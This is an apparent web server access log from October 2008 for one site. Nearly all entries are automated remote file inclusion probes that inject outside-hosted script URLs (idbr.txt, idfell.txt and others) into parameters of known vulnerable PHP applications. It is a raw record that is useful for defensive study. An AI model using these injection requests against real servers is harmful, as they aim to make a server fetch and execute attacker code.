129.187.254.85 - - [26/Oct/2008:18:57:56 -0700] "GET /appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:18:57:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:18:57:56 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:18:58:03 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:18:58:03 -0700] "GET /appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:18:58:03 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:01:45 -0700] "GET /logs/access_080811.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:01:52 -0700] "GET /logs/access_080811.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
63.246.155.74 - - [26/Oct/2008:19:04:18 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
63.246.155.74 - - [26/Oct/2008:19:04:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
63.246.155.74 - - [26/Oct/2008:19:04:18 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
63.246.155.74 - - [26/Oct/2008:19:07:19 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
208.64.216.6 - - [26/Oct/2008:19:10:05 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.emmaperquin.nl/components/com_akobook/safeoff.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.vspeaking.com"
208.64.216.6 - - [26/Oct/2008:19:10:05 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.emmaperquin.nl/components/com_akobook/safeoff.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.vspeaking.com"
208.64.216.6 - - [26/Oct/2008:19:10:05 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.emmaperquin.nl/components/com_akobook/safeoff.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:19:11:31 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:19:11:31 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:19:11:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
220.93.126.76 - - [26/Oct/2008:19:12:47 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
220.93.126.76 - - [26/Oct/2008:19:12:48 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
220.93.126.76 - - [26/Oct/2008:19:12:48 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:19:14:49 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
65.55.208.251 - - [26/Oct/2008:19:14:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.55.208.251 - - [26/Oct/2008:19:14:50 -0700] "GET /logs/access_081020.log HTTP/1.1" 200 1048576 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
63.246.155.74 - - [26/Oct/2008:19:15:56 -0700] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
67.19.77.250 - - [26/Oct/2008:19:17:00 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:21:41 -0700] "GET /logs/access_080804.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:21:42 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:21:42 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:19:22:39 -0700] "GET /logs/access_080811.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:25:19 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:25:20 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:25:20 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.203.140.19 - - [26/Oct/2008:19:26:51 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
89.203.140.19 - - [26/Oct/2008:19:26:51 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
89.203.140.19 - - [26/Oct/2008:19:26:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:26:57 -0700] "GET /logs//errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:26:57 -0700] "GET /logs/access.log//errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:26:57 -0700] "GET /errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:26:59 -0700] "GET /logs/access.log//errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:26:59 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:26:59 -0700] "GET /logs//errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:19:28:06 -0700] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:19:28:21 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:29:50 -0700] "GET /logs/access.log//kboard/kboard.php?board=free&act=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:29:50 -0700] "GET /logs/access.log//kboard/kboard.php?board=free&act=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:29:50 -0700] "GET /kboard/kboard.php?board=free&act=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:29:51 -0700] "GET /kboard/kboard.php?board=free&act=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:29:51 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:29:51 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:29:52 -0700] "GET /logs/access.log//errors.php?error=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:29:52 -0700] "GET /errors.php?error=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:29:52 -0700] "GET /logs//errors.php?error=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:29:57 -0700] "GET /logs/access.log//errors.php?error=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:29:57 -0700] "GET /errors.php?error=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:29:58 -0700] "GET /logs//errors.php?error=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:30:08 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:30:09 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:30:40 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:30:41 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:30:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:31:17 -0700] "GET /logs/access_080825.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:31:17 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:31:17 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:31:26 -0700] "GET /errors.php?error=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:31:26 -0700] "GET /logs/access.log//errors.php?error=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:31:26 -0700] "GET /logs//errors.php?error=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:31:46 -0700] "GET /logs/access_080825.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:31:46 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:31:47 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.19 - - [26/Oct/2008:19:32:12 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://fondoempleados.com/uploaded/Fx29ID.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
77.221.130.19 - - [26/Oct/2008:19:32:12 -0700] "GET /appserv/main.php?appserv_root=http://fondoempleados.com/uploaded/Fx29ID.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
77.221.130.19 - - [26/Oct/2008:19:32:12 -0700] "GET /logs//appserv/main.php?appserv_root=http://fondoempleados.com/uploaded/Fx29ID.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
195.12.53.176 - - [26/Oct/2008:19:35:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/yputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.vspeaking.com"
195.12.53.176 - - [26/Oct/2008:19:35:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/yputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
131.220.23.114 - - [26/Oct/2008:19:36:02 -0700] "GET /Bughttp://cecilia.taizer.net/idsfeel.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
131.220.23.114 - - [26/Oct/2008:19:36:02 -0700] "GET /logs/Bughttp://cecilia.taizer.net/idsfeel.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:36:25 -0700] "GET /logs/access.log//kboard/kboard.php?board=free&act=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:36:25 -0700] "GET /kboard/kboard.php?board=free&act=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:19:36:25 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.55.209.4 - - [26/Oct/2008:19:37:02 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:37:14 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:37:14 -0700] "GET /appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:37:14 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:38:02 -0700] "GET /appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:38:02 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:38:02 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:38:14 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:38:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:38:14 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:38:30 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:38:30 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:38:30 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:39:02 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:39:02 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:39:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
124.0.208.252 - - [26/Oct/2008:19:39:24 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/zell1980/puisi/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.0.208.252 - - [26/Oct/2008:19:39:24 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/zell1980/puisi/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.0.208.252 - - [26/Oct/2008:19:39:25 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/zell1980/puisi/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:41:33 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:41:53 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:41:53 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:41:53 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:41:54 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:43:38 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
